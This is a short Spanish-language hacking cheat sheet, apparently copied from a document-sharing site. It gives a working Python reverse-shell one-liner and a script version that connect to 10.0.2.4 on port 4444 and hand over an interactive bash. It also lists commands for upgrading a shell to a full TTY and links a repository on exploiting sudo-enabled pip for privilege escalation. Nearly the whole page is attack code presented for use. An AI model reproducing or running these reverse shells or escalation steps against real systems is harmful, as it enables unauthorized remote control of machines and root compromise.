Está en la página 1de 1

python -c 'import

socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((
"10.0.2.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' # levanta un socket a
la dirección y al puerto dados y ejecuta una bash

---------------------------------------------------- Lo mismo que arriba pero para


scripts --------------
import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.0.2.4",4444));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

------------------------------------------------------------------------

python -c 'import pty; pty.spawn("/bin/bash")' # importa la library pty y crea una


bash

/bin/bash -i # ejecuta una bash en modo intercative

export TERM=xterm # exporta una xterm para ejecutar una shell completa

---------------------------- En este git explican cómo explotar un /usr/bin/pip con


privilegios de sudo ------
https://github.com/0x00-0x00/FakePip

También podría gustarte